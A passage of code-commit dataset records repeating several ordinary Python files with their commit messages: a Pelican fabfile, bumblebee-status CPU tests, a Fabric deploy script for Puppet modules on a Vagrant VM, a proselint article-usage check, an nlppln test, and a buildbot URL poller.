os.makedirs(DEPLOY_PATH)
def build():
"""Build local version of site"""
local('pelican -s pelicanconf.py')
def rebuild():
"""`clean` then `build`"""
clean()
build()
def regenerate():
"""Automatically regenerate site upon file modification"""
local('pelican -r -s pelicanconf.py')
def serve():
os.chdir(env.deploy_path)
PORT = 8000
class AddressReuseTCPServer(SocketServer.TCPServer):
allow_reuse_address = True
server = AddressReuseTCPServer(('', PORT), SimpleHTTPServer.SimpleHTTPRequestHandler)
sys.stderr.write('Serving on port {0} ...\n'.format(PORT))
server.serve_forever()
def reserve():
"""`build`, then `serve`"""
build()
serve()
def preview():
"""Build production version of site"""
local('pelican -s publishconf.py')
def publish(commit_message):
env.msg = commit_message
"""Publish to GitHub Pages"""
clean()
preview()
local("ghp-import -m '{msg}' -b {gp_branch} {deploy_path}".format(**env))
local("git push origin {gp_branch}".format(**env))
|
|
69dceca7d089b356a6a259592640aebf6cdeaece
|
tests/modules/test_cpu.py
|
tests/modules/test_cpu.py
|
# pylint: disable=C0103,C0111
import json
import unittest
import mock
import tests.mocks as mocks
from bumblebee.config import Config
from bumblebee.input import I3BarInput, LEFT_MOUSE
from bumblebee.modules.cpu import Module
class TestCPUModule(unittest.TestCase):
def setUp(self):
self._stdin, self._select, self.stdin, self.select = mocks.epoll_mock("bumblebee.input")
self.popen = mocks.MockPopen()
self._psutil = mock.patch("bumblebee.modules.cpu.psutil")
self.psutil = self._psutil.start()
self.config = Config()
self.input = I3BarInput()
self.engine = mock.Mock()
self.engine.input = self.input
self.input.need_event = True
self.module = Module(engine=self.engine, config={ "config": self.config })
for widget in self.module.widgets():
widget.link_module(self.module)
self.anyWidget = widget
def tearDown(self):
self._stdin.stop()
self._select.stop()
self._psutil.stop()
self.popen.cleanup()
def test_format(self):
self.psutil.cpu_percent.return_value = 21.0
self.module.update_all()
for widget in self.module.widgets():
self.assertEquals(len(widget.full_text()), len("100.00%"))
def test_leftclick(self):
mocks.mouseEvent(stdin=self.stdin, button=LEFT_MOUSE, inp=self.input, module=self.module)
self.popen.assert_call("gnome-system-monitor")
def test_warning(self):
self.config.set("cpu.critical", "20")
self.config.set("cpu.warning", "18")
self.psutil.cpu_percent.return_value = 19.0
self.module.update_all()
self.assertTrue("warning" in self.module.state(self.anyWidget))
def test_critical(self):
self.config.set("cpu.critical", "20")
self.config.set("cpu.warning", "19")
self.psutil.cpu_percent.return_value = 21.0
self.module.update_all()
self.assertTrue("critical" in self.module.state(self.anyWidget))
# vim: tabstop=8 expandtab shiftwidth=4 softtabstop=4
|
Add unit tests for module cpu
|
[tests/cpu] Add unit tests for module cpu
|
Python
|
mit
|
tobi-wan-kenobi/bumblebee-status,tobi-wan-kenobi/bumblebee-status
|
[tests/cpu] Add unit tests for module cpu
|
# pylint: disable=C0103,C0111
import json
import unittest
import mock
import tests.mocks as mocks
from bumblebee.config import Config
from bumblebee.input import I3BarInput, LEFT_MOUSE
from bumblebee.modules.cpu import Module
class TestCPUModule(unittest.TestCase):
def setUp(self):
self._stdin, self._select, self.stdin, self.select = mocks.epoll_mock("bumblebee.input")
self.popen = mocks.MockPopen()
self._psutil = mock.patch("bumblebee.modules.cpu.psutil")
self.psutil = self._psutil.start()
self.config = Config()
self.input = I3BarInput()
self.engine = mock.Mock()
self.engine.input = self.input
self.input.need_event = True
self.module = Module(engine=self.engine, config={ "config": self.config })
for widget in self.module.widgets():
widget.link_module(self.module)
self.anyWidget = widget
def tearDown(self):
self._stdin.stop()
self._select.stop()
self._psutil.stop()
self.popen.cleanup()
def test_format(self):
self.psutil.cpu_percent.return_value = 21.0
self.module.update_all()
for widget in self.module.widgets():
self.assertEquals(len(widget.full_text()), len("100.00%"))
def test_leftclick(self):
mocks.mouseEvent(stdin=self.stdin, button=LEFT_MOUSE, inp=self.input, module=self.module)
self.popen.assert_call("gnome-system-monitor")
def test_warning(self):
self.config.set("cpu.critical", "20")
self.config.set("cpu.warning", "18")
self.psutil.cpu_percent.return_value = 19.0
self.module.update_all()
self.assertTrue("warning" in self.module.state(self.anyWidget))
def test_critical(self):
self.config.set("cpu.critical", "20")
self.config.set("cpu.warning", "19")
self.psutil.cpu_percent.return_value = 21.0
self.module.update_all()
self.assertTrue("critical" in self.module.state(self.anyWidget))
# vim: tabstop=8 expandtab shiftwidth=4 softtabstop=4
|
<commit_before><commit_msg>[tests/cpu] Add unit tests for module cpu<commit_after>
|
# pylint: disable=C0103,C0111
import json
import unittest
import mock
import tests.mocks as mocks
from bumblebee.config import Config
from bumblebee.input import I3BarInput, LEFT_MOUSE
from bumblebee.modules.cpu import Module
class TestCPUModule(unittest.TestCase):
def setUp(self):
self._stdin, self._select, self.stdin, self.select = mocks.epoll_mock("bumblebee.input")
self.popen = mocks.MockPopen()
self._psutil = mock.patch("bumblebee.modules.cpu.psutil")
self.psutil = self._psutil.start()
self.config = Config()
self.input = I3BarInput()
self.engine = mock.Mock()
self.engine.input = self.input
self.input.need_event = True
self.module = Module(engine=self.engine, config={ "config": self.config })
for widget in self.module.widgets():
widget.link_module(self.module)
self.anyWidget = widget
def tearDown(self):
self._stdin.stop()
self._select.stop()
self._psutil.stop()
self.popen.cleanup()
def test_format(self):
self.psutil.cpu_percent.return_value = 21.0
self.module.update_all()
for widget in self.module.widgets():
self.assertEquals(len(widget.full_text()), len("100.00%"))
def test_leftclick(self):
mocks.mouseEvent(stdin=self.stdin, button=LEFT_MOUSE, inp=self.input, module=self.module)
self.popen.assert_call("gnome-system-monitor")
def test_warning(self):
self.config.set("cpu.critical", "20")
self.config.set("cpu.warning", "18")
self.psutil.cpu_percent.return_value = 19.0
self.module.update_all()
self.assertTrue("warning" in self.module.state(self.anyWidget))
def test_critical(self):
self.config.set("cpu.critical", "20")
self.config.set("cpu.warning", "19")
self.psutil.cpu_percent.return_value = 21.0
self.module.update_all()
self.assertTrue("critical" in self.module.state(self.anyWidget))
# vim: tabstop=8 expandtab shiftwidth=4 softtabstop=4
|
[tests/cpu] Add unit tests for module cpu# pylint: disable=C0103,C0111
import json
import unittest
import mock
import tests.mocks as mocks
from bumblebee.config import Config
from bumblebee.input import I3BarInput, LEFT_MOUSE
from bumblebee.modules.cpu import Module
class TestCPUModule(unittest.TestCase):
def setUp(self):
self._stdin, self._select, self.stdin, self.select = mocks.epoll_mock("bumblebee.input")
self.popen = mocks.MockPopen()
self._psutil = mock.patch("bumblebee.modules.cpu.psutil")
self.psutil = self._psutil.start()
self.config = Config()
self.input = I3BarInput()
self.engine = mock.Mock()
self.engine.input = self.input
self.input.need_event = True
self.module = Module(engine=self.engine, config={ "config": self.config })
for widget in self.module.widgets():
widget.link_module(self.module)
self.anyWidget = widget
def tearDown(self):
self._stdin.stop()
self._select.stop()
self._psutil.stop()
self.popen.cleanup()
def test_format(self):
self.psutil.cpu_percent.return_value = 21.0
self.module.update_all()
for widget in self.module.widgets():
self.assertEquals(len(widget.full_text()), len("100.00%"))
def test_leftclick(self):
mocks.mouseEvent(stdin=self.stdin, button=LEFT_MOUSE, inp=self.input, module=self.module)
self.popen.assert_call("gnome-system-monitor")
def test_warning(self):
self.config.set("cpu.critical", "20")
self.config.set("cpu.warning", "18")
self.psutil.cpu_percent.return_value = 19.0
self.module.update_all()
self.assertTrue("warning" in self.module.state(self.anyWidget))
def test_critical(self):
self.config.set("cpu.critical", "20")
self.config.set("cpu.warning", "19")
self.psutil.cpu_percent.return_value = 21.0
self.module.update_all()
self.assertTrue("critical" in self.module.state(self.anyWidget))
# vim: tabstop=8 expandtab shiftwidth=4 softtabstop=4
|
<commit_before><commit_msg>[tests/cpu] Add unit tests for module cpu<commit_after># pylint: disable=C0103,C0111
import json
import unittest
import mock
import tests.mocks as mocks
from bumblebee.config import Config
from bumblebee.input import I3BarInput, LEFT_MOUSE
from bumblebee.modules.cpu import Module
class TestCPUModule(unittest.TestCase):
def setUp(self):
self._stdin, self._select, self.stdin, self.select = mocks.epoll_mock("bumblebee.input")
self.popen = mocks.MockPopen()
self._psutil = mock.patch("bumblebee.modules.cpu.psutil")
self.psutil = self._psutil.start()
self.config = Config()
self.input = I3BarInput()
self.engine = mock.Mock()
self.engine.input = self.input
self.input.need_event = True
self.module = Module(engine=self.engine, config={ "config": self.config })
for widget in self.module.widgets():
widget.link_module(self.module)
self.anyWidget = widget
def tearDown(self):
self._stdin.stop()
self._select.stop()
self._psutil.stop()
self.popen.cleanup()
def test_format(self):
self.psutil.cpu_percent.return_value = 21.0
self.module.update_all()
for widget in self.module.widgets():
self.assertEquals(len(widget.full_text()), len("100.00%"))
def test_leftclick(self):
mocks.mouseEvent(stdin=self.stdin, button=LEFT_MOUSE, inp=self.input, module=self.module)
self.popen.assert_call("gnome-system-monitor")
def test_warning(self):
self.config.set("cpu.critical", "20")
self.config.set("cpu.warning", "18")
self.psutil.cpu_percent.return_value = 19.0
self.module.update_all()
self.assertTrue("warning" in self.module.state(self.anyWidget))
def test_critical(self):
self.config.set("cpu.critical", "20")
self.config.set("cpu.warning", "19")
self.psutil.cpu_percent.return_value = 21.0
self.module.update_all()
self.assertTrue("critical" in self.module.state(self.anyWidget))
# vim: tabstop=8 expandtab shiftwidth=4 softtabstop=4
|
|
be55f40e56127e10779c0ec6ee2d628dbcf529ce
|
fabfile.py
|
fabfile.py
|
from fabric.api import cd, env, local, lcd, run
PUPPET_MASTER_IP = '192.168.33.10'
def puppet():
env.hosts = [
'vagrant@' + PUPPET_MASTER_IP + ':22',
]
env.passwords = {
'vagrant@' + PUPPET_MASTER_IP + ':22': 'vagrant'
}
def test():
with lcd('puppet/modules'):
with lcd('nginx'):
local('rspec')
def deploy():
puppet()
test()
run('rm -rf puppet-untitled-2016')
run('git clone https://github.com/zkan/puppet-untitled-2016.git')
run('sudo rm -rf /etc/puppet/manifests')
run('sudo ln -sf /home/vagrant/puppet-untitled-2016/puppet/manifests /etc/puppet/manifests')
run('sudo rm -rf /etc/puppet/modules')
run('sudo ln -sf /home/vagrant/puppet-untitled-2016/puppet/modules /etc/puppet/modules')
|
Use fabric to deploy Puppet modules
|
Use fabric to deploy Puppet modules
|
Python
|
mit
|
zkan/puppet-untitled-2016,zkan/puppet-untitled-2016
|
Use fabric to deploy Puppet modules
|
from fabric.api import cd, env, local, lcd, run
PUPPET_MASTER_IP = '192.168.33.10'
def puppet():
env.hosts = [
'vagrant@' + PUPPET_MASTER_IP + ':22',
]
env.passwords = {
'vagrant@' + PUPPET_MASTER_IP + ':22': 'vagrant'
}
def test():
with lcd('puppet/modules'):
with lcd('nginx'):
local('rspec')
def deploy():
puppet()
test()
run('rm -rf puppet-untitled-2016')
run('git clone https://github.com/zkan/puppet-untitled-2016.git')
run('sudo rm -rf /etc/puppet/manifests')
run('sudo ln -sf /home/vagrant/puppet-untitled-2016/puppet/manifests /etc/puppet/manifests')
run('sudo rm -rf /etc/puppet/modules')
run('sudo ln -sf /home/vagrant/puppet-untitled-2016/puppet/modules /etc/puppet/modules')
|
<commit_before><commit_msg>Use fabric to deploy Puppet modules<commit_after>
|
from fabric.api import cd, env, local, lcd, run
PUPPET_MASTER_IP = '192.168.33.10'
def puppet():
env.hosts = [
'vagrant@' + PUPPET_MASTER_IP + ':22',
]
env.passwords = {
'vagrant@' + PUPPET_MASTER_IP + ':22': 'vagrant'
}
def test():
with lcd('puppet/modules'):
with lcd('nginx'):
local('rspec')
def deploy():
puppet()
test()
run('rm -rf puppet-untitled-2016')
run('git clone https://github.com/zkan/puppet-untitled-2016.git')
run('sudo rm -rf /etc/puppet/manifests')
run('sudo ln -sf /home/vagrant/puppet-untitled-2016/puppet/manifests /etc/puppet/manifests')
run('sudo rm -rf /etc/puppet/modules')
run('sudo ln -sf /home/vagrant/puppet-untitled-2016/puppet/modules /etc/puppet/modules')
|
Use fabric to deploy Puppet modulesfrom fabric.api import cd, env, local, lcd, run
PUPPET_MASTER_IP = '192.168.33.10'
def puppet():
env.hosts = [
'vagrant@' + PUPPET_MASTER_IP + ':22',
]
env.passwords = {
'vagrant@' + PUPPET_MASTER_IP + ':22': 'vagrant'
}
def test():
with lcd('puppet/modules'):
with lcd('nginx'):
local('rspec')
def deploy():
puppet()
test()
run('rm -rf puppet-untitled-2016')
run('git clone https://github.com/zkan/puppet-untitled-2016.git')
run('sudo rm -rf /etc/puppet/manifests')
run('sudo ln -sf /home/vagrant/puppet-untitled-2016/puppet/manifests /etc/puppet/manifests')
run('sudo rm -rf /etc/puppet/modules')
run('sudo ln -sf /home/vagrant/puppet-untitled-2016/puppet/modules /etc/puppet/modules')
|
<commit_before><commit_msg>Use fabric to deploy Puppet modules<commit_after>from fabric.api import cd, env, local, lcd, run
PUPPET_MASTER_IP = '192.168.33.10'
def puppet():
env.hosts = [
'vagrant@' + PUPPET_MASTER_IP + ':22',
]
env.passwords = {
'vagrant@' + PUPPET_MASTER_IP + ':22': 'vagrant'
}
def test():
with lcd('puppet/modules'):
with lcd('nginx'):
local('rspec')
def deploy():
puppet()
test()
run('rm -rf puppet-untitled-2016')
run('git clone https://github.com/zkan/puppet-untitled-2016.git')
run('sudo rm -rf /etc/puppet/manifests')
run('sudo ln -sf /home/vagrant/puppet-untitled-2016/puppet/manifests /etc/puppet/manifests')
run('sudo rm -rf /etc/puppet/modules')
run('sudo ln -sf /home/vagrant/puppet-untitled-2016/puppet/modules /etc/puppet/modules')
|
|
b5cfe24ceba05aa9e94947f4a9a1223651095f98
|
proselint/checks/mau_a_vs_an.py
|
proselint/checks/mau_a_vs_an.py
|
# -*- coding: utf-8 -*-
"""MAU100: a vs. an
---
layout: post
error_code: MAU101
source: Garner's Modern American Usage
source_url: http://amzn.to/15wF76r
title: a vs. an
date: 2014-06-10 12:31:19
categories: writing
---
The first line is always wrong.
"""
import re
from nltk.corpus import cmudict
from proselint.memoize import memoize
def check(text):
error_code = "MAU101"
msg_a = "'a' should be 'an'."
msg_an = "'an' should be 'a'."
dic = cmudict.dict()
@memoize
def starts_with_vowel_sound(word):
"""Does the word start with a vowel sound?"""
# Get the pronunciations of the word.
pronunciations = dic.get(word)
if pronunciations is None:
return None
# For each pronunciation, see if it starts with a vowel sound.
is_vowel = [p[0][-1].isdigit() for p in pronunciations]
# Return the appropriate value only if all the pronunciations match.
if all(is_vowel):
return True
elif not any(is_vowel):
return False
else:
return None
errors = []
regex = re.compile("(^|\s+)(A|a|An|an)\s(\S*)\W")
# Find all occurences of the regex in the text.
for m in regex.finditer(text):
words = [group for group in m.groups()]
vowel_sound = starts_with_vowel_sound(words[1])
if vowel_sound is None:
continue
# A apple.
if words[0] in ["A", "a"] and vowel_sound:
errors.append((m.start(), m.end(), error_code, msg_a))
# An day.
elif words[0] in ["An", "an"] and not vowel_sound:
errors.append((m.start(), m.end(), error_code, msg_an))
return errors
|
Add 'a' vs. 'an' rule
|
Add 'a' vs. 'an' rule
#31
|
Python
|
bsd-3-clause
|
amperser/proselint,amperser/proselint,amperser/proselint,jstewmon/proselint,amperser/proselint,amperser/proselint,jstewmon/proselint,jstewmon/proselint
|
Add 'a' vs. 'an' rule
#31
|
# -*- coding: utf-8 -*-
"""MAU100: a vs. an
---
layout: post
error_code: MAU101
source: Garner's Modern American Usage
source_url: http://amzn.to/15wF76r
title: a vs. an
date: 2014-06-10 12:31:19
categories: writing
---
The first line is always wrong.
"""
import re
from nltk.corpus import cmudict
from proselint.memoize import memoize
def check(text):
error_code = "MAU101"
msg_a = "'a' should be 'an'."
msg_an = "'an' should be 'a'."
dic = cmudict.dict()
@memoize
def starts_with_vowel_sound(word):
"""Does the word start with a vowel sound?"""
# Get the pronunciations of the word.
pronunciations = dic.get(word)
if pronunciations is None:
return None
# For each pronunciation, see if it starts with a vowel sound.
is_vowel = [p[0][-1].isdigit() for p in pronunciations]
# Return the appropriate value only if all the pronunciations match.
if all(is_vowel):
return True
elif not any(is_vowel):
return False
else:
return None
errors = []
regex = re.compile("(^|\s+)(A|a|An|an)\s(\S*)\W")
# Find all occurences of the regex in the text.
for m in regex.finditer(text):
words = [group for group in m.groups()]
vowel_sound = starts_with_vowel_sound(words[1])
if vowel_sound is None:
continue
# A apple.
if words[0] in ["A", "a"] and vowel_sound:
errors.append((m.start(), m.end(), error_code, msg_a))
# An day.
elif words[0] in ["An", "an"] and not vowel_sound:
errors.append((m.start(), m.end(), error_code, msg_an))
return errors
|
<commit_before><commit_msg>Add 'a' vs. 'an' rule
#31<commit_after>
|
# -*- coding: utf-8 -*-
"""MAU100: a vs. an
---
layout: post
error_code: MAU101
source: Garner's Modern American Usage
source_url: http://amzn.to/15wF76r
title: a vs. an
date: 2014-06-10 12:31:19
categories: writing
---
The first line is always wrong.
"""
import re
from nltk.corpus import cmudict
from proselint.memoize import memoize
def check(text):
error_code = "MAU101"
msg_a = "'a' should be 'an'."
msg_an = "'an' should be 'a'."
dic = cmudict.dict()
@memoize
def starts_with_vowel_sound(word):
"""Does the word start with a vowel sound?"""
# Get the pronunciations of the word.
pronunciations = dic.get(word)
if pronunciations is None:
return None
# For each pronunciation, see if it starts with a vowel sound.
is_vowel = [p[0][-1].isdigit() for p in pronunciations]
# Return the appropriate value only if all the pronunciations match.
if all(is_vowel):
return True
elif not any(is_vowel):
return False
else:
return None
errors = []
regex = re.compile("(^|\s+)(A|a|An|an)\s(\S*)\W")
# Find all occurences of the regex in the text.
for m in regex.finditer(text):
words = [group for group in m.groups()]
vowel_sound = starts_with_vowel_sound(words[1])
if vowel_sound is None:
continue
# A apple.
if words[0] in ["A", "a"] and vowel_sound:
errors.append((m.start(), m.end(), error_code, msg_a))
# An day.
elif words[0] in ["An", "an"] and not vowel_sound:
errors.append((m.start(), m.end(), error_code, msg_an))
return errors
|
Add 'a' vs. 'an' rule
#31# -*- coding: utf-8 -*-
"""MAU100: a vs. an
---
layout: post
error_code: MAU101
source: Garner's Modern American Usage
source_url: http://amzn.to/15wF76r
title: a vs. an
date: 2014-06-10 12:31:19
categories: writing
---
The first line is always wrong.
"""
import re
from nltk.corpus import cmudict
from proselint.memoize import memoize
def check(text):
error_code = "MAU101"
msg_a = "'a' should be 'an'."
msg_an = "'an' should be 'a'."
dic = cmudict.dict()
@memoize
def starts_with_vowel_sound(word):
"""Does the word start with a vowel sound?"""
# Get the pronunciations of the word.
pronunciations = dic.get(word)
if pronunciations is None:
return None
# For each pronunciation, see if it starts with a vowel sound.
is_vowel = [p[0][-1].isdigit() for p in pronunciations]
# Return the appropriate value only if all the pronunciations match.
if all(is_vowel):
return True
elif not any(is_vowel):
return False
else:
return None
errors = []
regex = re.compile("(^|\s+)(A|a|An|an)\s(\S*)\W")
# Find all occurences of the regex in the text.
for m in regex.finditer(text):
words = [group for group in m.groups()]
vowel_sound = starts_with_vowel_sound(words[1])
if vowel_sound is None:
continue
# A apple.
if words[0] in ["A", "a"] and vowel_sound:
errors.append((m.start(), m.end(), error_code, msg_a))
# An day.
elif words[0] in ["An", "an"] and not vowel_sound:
errors.append((m.start(), m.end(), error_code, msg_an))
return errors
|
<commit_before><commit_msg>Add 'a' vs. 'an' rule
#31<commit_after># -*- coding: utf-8 -*-
"""MAU100: a vs. an
---
layout: post
error_code: MAU101
source: Garner's Modern American Usage
source_url: http://amzn.to/15wF76r
title: a vs. an
date: 2014-06-10 12:31:19
categories: writing
---
The first line is always wrong.
"""
import re
from nltk.corpus import cmudict
from proselint.memoize import memoize
def check(text):
error_code = "MAU101"
msg_a = "'a' should be 'an'."
msg_an = "'an' should be 'a'."
dic = cmudict.dict()
@memoize
def starts_with_vowel_sound(word):
"""Does the word start with a vowel sound?"""
# Get the pronunciations of the word.
pronunciations = dic.get(word)
if pronunciations is None:
return None
# For each pronunciation, see if it starts with a vowel sound.
is_vowel = [p[0][-1].isdigit() for p in pronunciations]
# Return the appropriate value only if all the pronunciations match.
if all(is_vowel):
return True
elif not any(is_vowel):
return False
else:
return None
errors = []
regex = re.compile("(^|\s+)(A|a|An|an)\s(\S*)\W")
# Find all occurences of the regex in the text.
for m in regex.finditer(text):
words = [group for group in m.groups()]
vowel_sound = starts_with_vowel_sound(words[1])
if vowel_sound is None:
continue
# A apple.
if words[0] in ["A", "a"] and vowel_sound:
errors.append((m.start(), m.end(), error_code, msg_a))
# An day.
elif words[0] in ["An", "an"] and not vowel_sound:
errors.append((m.start(), m.end(), error_code, msg_an))
return errors
|
|
7a4dbefbd105653866cdbad85965c07e30716b77
|
tests/test_wfgenerator.py
|
tests/test_wfgenerator.py
|
import pytest
from nlppln import WorkflowGenerator
class TestWFGenerator(object):
@pytest.fixture
def wf(self):
return WorkflowGenerator()
def test_steps_in_library(self, wf):
assert len(wf.steps_library) > 0
|
Test that at least one step is loaded in the steps library
|
Test that at least one step is loaded in the steps library
|
Python
|
apache-2.0
|
WhatWorksWhenForWhom/nlppln,WhatWorksWhenForWhom/nlppln,WhatWorksWhenForWhom/nlppln
|
Test that at least one step is loaded in the steps library
|
import pytest
from nlppln import WorkflowGenerator
class TestWFGenerator(object):
@pytest.fixture
def wf(self):
return WorkflowGenerator()
def test_steps_in_library(self, wf):
assert len(wf.steps_library) > 0
|
<commit_before><commit_msg>Test that at least one step is loaded in the steps library<commit_after>
|
import pytest
from nlppln import WorkflowGenerator
class TestWFGenerator(object):
@pytest.fixture
def wf(self):
return WorkflowGenerator()
def test_steps_in_library(self, wf):
assert len(wf.steps_library) > 0
|
Test that at least one step is loaded in the steps libraryimport pytest
from nlppln import WorkflowGenerator
class TestWFGenerator(object):
@pytest.fixture
def wf(self):
return WorkflowGenerator()
def test_steps_in_library(self, wf):
assert len(wf.steps_library) > 0
|
<commit_before><commit_msg>Test that at least one step is loaded in the steps library<commit_after>import pytest
from nlppln import WorkflowGenerator
class TestWFGenerator(object):
@pytest.fixture
def wf(self):
return WorkflowGenerator()
def test_steps_in_library(self, wf):
assert len(wf.steps_library) > 0
|
|
aedf8153750e0a45dd40fdc92e650ccaa944e22c
|
scripts/master/url_poller.py
|
scripts/master/url_poller.py
|
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""This PollingChangeSource polls a URL for the change number.
Each change is submited to change master which triggers build steps.
Example:
To poll a change in Chromium build snapshots, use -
from buildbot.changes import url_poller
changeurl = 'http://commondatastorage.googleapis.com/'
'chromium-browser-snapshots/Linux/LAST_CHANGE'
poller = urlpoller.URLPoller(changeurl=changeurl, pollInterval=10800)
c['change_source'] = [poller]
"""
from twisted.python import log
from twisted.web.client import getPage
from buildbot.changes import base
class URLPoller(base.PollingChangeSource):
"""Poll a URL for change number and submit to change master."""
compare_attrs = ['changeurl', 'pollInterval']
def __init__(self, changeurl, pollInterval=3600, category=None):
"""Initialize URLPoller.
Args:
changeurl: The URL to change number.
pollInterval: The time (in seconds) between queries for
changes (default is 1 hour)
"""
self.changeurl = changeurl
self.pollInterval = pollInterval
self.category = category
self.last_change = None
base.PollingChangeSource.__init__(self, changeurl, pollInterval, category)
def describe(self):
return 'URLPoller watching %s' % self.changeurl
def poll(self):
log.msg('URLPoller polling %s' % self.changeurl)
d = getPage(self.changeurl, timeout=self.pollInterval)
d.addCallback(self._process_changes)
d.addErrback(self._finished_failure)
return d
def _finished_failure(self, res):
log.msg('URLPoller poll failed: %s. URL: %s' % (res, self.changeurl))
def _process_changes(self, change):
log.msg('URLPoller finished polling %s' % self.changeurl)
# Skip calling addChange() if this is the first successful poll.
if self.last_change != change:
self.master.addChange(who='committer',
files=[],
comments='comment',
category=self.category)
self.last_change = change
|
Add a URL poller for Chromebot.
|
Add a URL poller for Chromebot.
Specificly for Chromebot, it just need a simple way to trigger tests when 'http://commondatastorage.googleapis.com/chromium-browser-snapshots/Linux/LAST_CHANGE' changes.
Review URL: https://chromiumcodereview.appspot.com/12079048
git-svn-id: 239fca9b83025a0b6f823aeeca02ba5be3d9fd76@180488 0039d316-1c4b-4281-b951-d872f2087c98
|
Python
|
bsd-3-clause
|
eunchong/build,eunchong/build,eunchong/build,eunchong/build
|
Add a URL poller for Chromebot.
Specificly for Chromebot, it just need a simple way to trigger tests when 'http://commondatastorage.googleapis.com/chromium-browser-snapshots/Linux/LAST_CHANGE' changes.
Review URL: https://chromiumcodereview.appspot.com/12079048
git-svn-id: 239fca9b83025a0b6f823aeeca02ba5be3d9fd76@180488 0039d316-1c4b-4281-b951-d872f2087c98
|
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""This PollingChangeSource polls a URL for the change number.
Each change is submited to change master which triggers build steps.
Example:
To poll a change in Chromium build snapshots, use -
from buildbot.changes import url_poller
changeurl = 'http://commondatastorage.googleapis.com/'
'chromium-browser-snapshots/Linux/LAST_CHANGE'
poller = urlpoller.URLPoller(changeurl=changeurl, pollInterval=10800)
c['change_source'] = [poller]
"""
from twisted.python import log
from twisted.web.client import getPage
from buildbot.changes import base
class URLPoller(base.PollingChangeSource):
"""Poll a URL for change number and submit to change master."""
compare_attrs = ['changeurl', 'pollInterval']
def __init__(self, changeurl, pollInterval=3600, category=None):
"""Initialize URLPoller.
Args:
changeurl: The URL to change number.
pollInterval: The time (in seconds) between queries for
changes (default is 1 hour)
"""
self.changeurl = changeurl
self.pollInterval = pollInterval
self.category = category
self.last_change = None
base.PollingChangeSource.__init__(self, changeurl, pollInterval, category)
def describe(self):
return 'URLPoller watching %s' % self.changeurl
def poll(self):
log.msg('URLPoller polling %s' % self.changeurl)
d = getPage(self.changeurl, timeout=self.pollInterval)
d.addCallback(self._process_changes)
d.addErrback(self._finished_failure)
return d
def _finished_failure(self, res):
log.msg('URLPoller poll failed: %s. URL: %s' % (res, self.changeurl))
def _process_changes(self, change):
log.msg('URLPoller finished polling %s' % self.changeurl)
# Skip calling addChange() if this is the first successful poll.
if self.last_change != change:
self.master.addChange(who='committer',
files=[],
comments='comment',
category=self.category)
self.last_change = change
|
<commit_before><commit_msg>Add a URL poller for Chromebot.
Specificly for Chromebot, it just need a simple way to trigger tests when 'http://commondatastorage.googleapis.com/chromium-browser-snapshots/Linux/LAST_CHANGE' changes.
Review URL: https://chromiumcodereview.appspot.com/12079048
git-svn-id: 239fca9b83025a0b6f823aeeca02ba5be3d9fd76@180488 0039d316-1c4b-4281-b951-d872f2087c98<commit_after>
|
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""This PollingChangeSource polls a URL for the change number.
Each change is submited to change master which triggers build steps.
Example:
To poll a change in Chromium build snapshots, use -
from buildbot.changes import url_poller
changeurl = 'http://commondatastorage.googleapis.com/'
'chromium-browser-snapshots/Linux/LAST_CHANGE'
poller = urlpoller.URLPoller(changeurl=changeurl, pollInterval=10800)
c['change_source'] = [poller]
"""
from twisted.python import log
from twisted.web.client import getPage
from buildbot.changes import base
class URLPoller(base.PollingChangeSource):
"""Poll a URL for change number and submit to change master."""
compare_attrs = ['changeurl', 'pollInterval']
def __init__(self, changeurl, pollInterval=3600, category=None):
"""Initialize URLPoller.
Args:
changeurl: The URL to change number.
pollInterval: The time (in seconds) between queries for
changes (default is 1 hour)
"""
self.changeurl = changeurl
self.pollInterval = pollInterval
self.category = category
self.last_change = None
base.PollingChangeSource.__init__(self, changeurl, pollInterval, category)
def describe(self):
return 'URLPoller watching %s' % self.changeurl
def poll(self):
log.msg('URLPoller polling %s' % self.changeurl)
d = getPage(self.changeurl, timeout=self.pollInterval)
d.addCallback(self._process_changes)
d.addErrback(self._finished_failure)
return d
def _finished_failure(self, res):
log.msg('URLPoller poll failed: %s. URL: %s' % (res, self.changeurl))
def _process_changes(self, change):
log.msg('URLPoller finished polling %s' % self.changeurl)
# Skip calling addChange() if this is the first successful poll.
if self.last_change != change:
self.master.addChange(who='committer',
files=[],
comments='comment',
category=self.category)
self.last_change = change
|
Add a URL poller for Chromebot.
Specificly for Chromebot, it just need a simple way to trigger tests when 'http://commondatastorage.googleapis.com/chromium-browser-snapshots/Linux/LAST_CHANGE' changes.
Review URL: https://chromiumcodereview.appspot.com/12079048
git-svn-id: 239fca9b83025a0b6f823aeeca02ba5be3d9fd76@180488 0039d316-1c4b-4281-b951-d872f2087c98# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""This PollingChangeSource polls a URL for the change number.
Each change is submited to change master which triggers build steps.
Example:
To poll a change in Chromium build snapshots, use -
from buildbot.changes import url_poller
changeurl = 'http://commondatastorage.googleapis.com/'
'chromium-browser-snapshots/Linux/LAST_CHANGE'
poller = urlpoller.URLPoller(changeurl=changeurl, pollInterval=10800)
c['change_source'] = [poller]
"""
from twisted.python import log
from twisted.web.client import getPage
from buildbot.changes import base
class URLPoller(base.PollingChangeSource):
"""Poll a URL for change number and submit to change master."""
compare_attrs = ['changeurl', 'pollInterval']
def __init__(self, changeurl, pollInterval=3600, category=None):
"""Initialize URLPoller.
Args:
changeurl: The URL to change number.
pollInterval: The time (in seconds) between queries for
changes (default is 1 hour)
"""
self.changeurl = changeurl
self.pollInterval = pollInterval
self.category = category
self.last_change = None
base.PollingChangeSource.__init__(self, changeurl, pollInterval, category)
def describe(self):
return 'URLPoller watching %s' % self.changeurl
def poll(self):
log.msg('URLPoller polling %s' % self.changeurl)
d = getPage(self.changeurl, timeout=self.pollInterval)
d.addCallback(self._process_changes)
d.addErrback(self._finished_failure)
return d
def _finished_failure(self, res):
log.msg('URLPoller poll failed: %s. URL: %s' % (res, self.changeurl))
def _process_changes(self, change):
log.msg('URLPoller finished polling %s' % self.changeurl)
# Skip calling addChange() if this is the first successful poll.
if self.last_change != change:
self.master.addChange(who='committer',
files=[],
comments='comment',
category=self.category)
self.last_change = change
|
<commit_before><commit_msg>Add a URL poller for Chromebot.
